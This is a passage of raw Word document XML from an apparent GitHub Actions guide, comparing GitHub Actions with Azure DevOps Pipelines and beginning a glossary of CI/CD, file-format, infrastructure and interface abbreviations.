          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">If you're moving from one to the other, the mental model carries over. Most of what you learn translates.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Where GitHub Actions wins (in my experience)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Tighter integration with the code</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">. Workflow files live next to the code they're building, in the same repo. PR-driven CI feels native; on Azure DevOps it feels stitched-on, especially when the repo is also on GitHub.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">A bigger and fresher marketplace</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">. More community actions, more languages, more recent updates. The Azure DevOps Tasks ecosystem is solid but smaller.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Cleaner OIDC story to the clouds</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">. AWS, Azure, and GCP all have first-class GitHub OIDC support, and the configuration is well-documented. You can ship to production without ever creating a service principal password.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Free for public repos, no asterisks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">. Unlimited minutes, indefinitely. Azure DevOps' free tier for public repos exists but the limits change more often.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Simpler YAML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">. One file. No "stage vs. job" distinction until you actually need it. Less ceremony for small workflows.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Where Azure DevOps still wins</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">First-class stages for big release pipelines</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">. If your release flow is "build → test → deploy to dev → wait for QA → deploy to staging → wait for product → deploy to prod across 5 regions," Azure DevOps' stages model that more naturally than GitHub Actions's </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">needs:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> chains. GitHub can do it, but it gets verbose.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Boards + Repos + Pipelines as one product</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">. If your team already uses Azure Boards for tickets and Azure Repos for code, sticking with Pipelines is one less context switch.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Mature self-hosted agents for restricted networks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">. Azure DevOps's self-hosted agent story is more polished for enterprises that can't have runners reaching out to the public internet.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Azure Artifacts for package feeds</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">. NuGet, npm, Maven, and Python feeds in one place with retention policies. GitHub Packages is catching up but isn't quite there for some ecosystems.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">License posture for Microsoft-heavy shops</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">. If your org already pays Microsoft for everything else, adding Azure DevOps is often a paperwork formality.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">How to choose</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">A practical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Your situation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="2"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="2"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="2"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="2"/>
            </w:tcBorders>
            <w:shd w:fill="1F3864"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What I'd pick</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Code on GitHub, deploying anywhere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b/>
                <w:bCs/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">GitHub Actions</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">. The integration pays for itself.</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Code on Azure Repos, deploying to Azure</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b/>
                <w:bCs/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Azure DevOps Pipelines</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">. Same logic in reverse.</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Code on GitHub, infrastructure on Azure, starting fresh</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b/>
                <w:bCs/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">GitHub Actions</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">, deploy </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">to</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> Azure. The OIDC story is excellent and the developer experience is better.</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Complex multi-stage release pipelines (5+ stages, multiple approval gates per region)</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b/>
                <w:bCs/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Azure DevOps Pipelines</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> — its stages model handles that complexity more cleanly.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Single product, small team, mostly CI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="2"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="2"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="2"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="2"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">GitHub Actions</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">. It's the lower-overhead choice.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">The honest summary: if you're starting today, GitHub Actions is the default. Azure DevOps is the right choice when you have specific reasons — usually existing Microsoft tooling investment or unusually complex release flows.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="CCCCCC" w:sz="6" w:space="6"/>
        </w:pBdr>
        <w:spacing w:after="240" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">19. Abbreviations, defined</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Reference list. Every short form used in this document, with a real definition — not just the expansion.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">CI/CD terms</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">CI — Continuous Integration.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> A practice of merging code changes frequently, with every merge verified by automated builds and tests. The point is to catch problems early, before they pile up.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">CD — Continuous Delivery / Continuous Deployment.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> Two related ideas sharing one abbreviation. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Continuous Delivery</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> means every change that passes CI is packaged and ready to deploy, but the actual release is a one-click manual step. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Continuous Deployment</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> means every change that passes CI goes straight to production, no manual gate.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">CI/CD.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> The combined pipeline from commit to running system.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">PR — Pull Request.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> A request on GitHub to merge changes from one branch into another. Where code review and most automation happens.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">File formats and data</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">YAML — YAML Ain't Markup Language.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> A human-readable data-serialization format. Indentation (spaces, not tabs) defines structure. All GitHub Actions workflow files are YAML.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">JSON — JavaScript Object Notation.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> A lightweight data interchange format. Most GitHub API responses are JSON.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">URL — Uniform Resource Locator.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> The address of a resource on the web.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Infrastructure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">VM — Virtual Machine.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> A software-emulated computer that runs on shared physical hardware. GitHub Actions runners are VMs — fresh for each job, destroyed when the job ends.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">OS — Operating System.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> The software layer that manages hardware. GitHub-hosted runners support Ubuntu, macOS, and Windows.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">UTC — Coordinated Universal Time.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> The global time standard. Cron schedules in GitHub Actions are always evaluated in UTC, not your local time.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Interfaces and tools</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">API — Application Programming Interface.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> A set of rules and endpoints that let software talk to software. The GitHub REST and GraphQL APIs are how workflows read and modify repo state programmatically.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
